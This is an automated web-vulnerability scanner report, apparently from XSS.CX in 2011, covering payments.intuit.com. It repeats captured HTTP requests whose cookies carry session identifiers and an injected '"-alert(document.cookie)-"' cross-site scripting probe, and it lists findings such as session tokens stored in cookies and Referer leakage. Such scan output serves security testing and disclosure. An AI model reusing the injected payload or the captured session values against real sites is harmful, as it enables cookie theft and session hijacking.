GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sbweb/common/includes/header/super_navigation/includes/search.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /support/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /support/glossary.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:21:40 GMT Server: Apache Last-Modified: Mon, 21 Mar 2011 05:28:55 GMT Accept-Ranges: bytes Vary: Accept-Encoding P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV" Content-Type: application/javascript Content-Length: 11613
var INCLUDE_OBJECT = PaymentsInclude; var testcell; var p20; var v20; function getFieldValue(fieldId) { s=s_gi(s_account); s.linkTrackVars = "prop20,eVar20"; fieldValue = document.getElementB ...[SNIP]... 1; }
if (s.evar2 == 'ipsi') { var ipd2; var ipd3; if (!("undefined" == typeof(wa))) { if (wa.ipd2) {ipd2 = wa.ipd2} if (wa.ipd3) {ipd3 = wa.ipd3} } else { ipd2='ipd_ips_<%=session.getAttribute("qbflv") %>_<%=session.getAttribute("qbsku") %>_<%=session.getAttribute("qbver") %>_<%=session.getAttribute("t1") %>_<%=session.getAttribute("t2") %>_<%=session.getAttribute("p_prioritycode") %>'; ipd3 = '<%=session.getAttribute("qbflv") %><%=session.getAttribute("qbver") %>'; } // IPD Central tracking - ipd_ips_sku_version_testcell_segment_pcode s.prop35=s.eVar35=ipd2; // IPD Central tracking - flavor + version s.prop34=s.eVar34=ipd3; }
5. Cross-domain Referer leakagepreviousnext There are 5 instances of this issue:
...[SNIP]... <a href ="mailto:gopayment_sales@intuit.com?subject=GoPayment-Supported-Phones"> ...[SNIP]... <p> If you've already applied and have questions on the status of your application, send an e-mail to app-status@intuit.com or call
<!-- Changes NIGIRI Support Phone numbers --> ...[SNIP]...
...[SNIP]... <p> If you've already applied and have questions about the status of your application, send an e-mail to app-status@intuit.com or please call
<!-- Changes NIGIRI Support Phone numbers --> ...[SNIP]...
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:21:26 GMT Server: Apache Last-Modified: Mon, 21 Mar 2011 05:28:55 GMT Accept-Ranges: bytes Vary: Accept-Encoding P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV" Content-Type: application/javascript Content-Length: 27792
/* ACCOUNT */ // Check if this is defined, otherwise default to the common SBE account if (scAccount.length > 0) { s_account = scAccount; } else { s_account = "intuitsbe"; } s = s_gi(s_acco ...[SNIP]... `i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p" +"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo" +"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd= ...[SNIP]...
HTTP/1.1 404 Not Found Date: Mon, 21 Mar 2011 16:21:27 GMT Server: Apache Accept-Ranges: bytes Vary: Accept-Encoding P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV" Content-Type: text/html Content-Length: 3585
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title>Error 404: Page Not Found</title> <link href="/css/wcgErrorPgs.css" re ...[SNIP]...
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:21:26 GMT Server: Apache Last-Modified: Mon, 21 Mar 2011 05:28:55 GMT Accept-Ranges: bytes Vary: Accept-Encoding P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV" Content-Type: application/javascript Content-Length: 27792
/* ACCOUNT */ // Check if this is defined, otherwise default to the common SBE account if (scAccount.length > 0) { s_account = scAccount; } else { s_account = "intuitsbe"; } s = s_gi(s_acco ...[SNIP]...
Report generated by XSS.CX at Mon Mar 21 14:59:37 CDT 2011.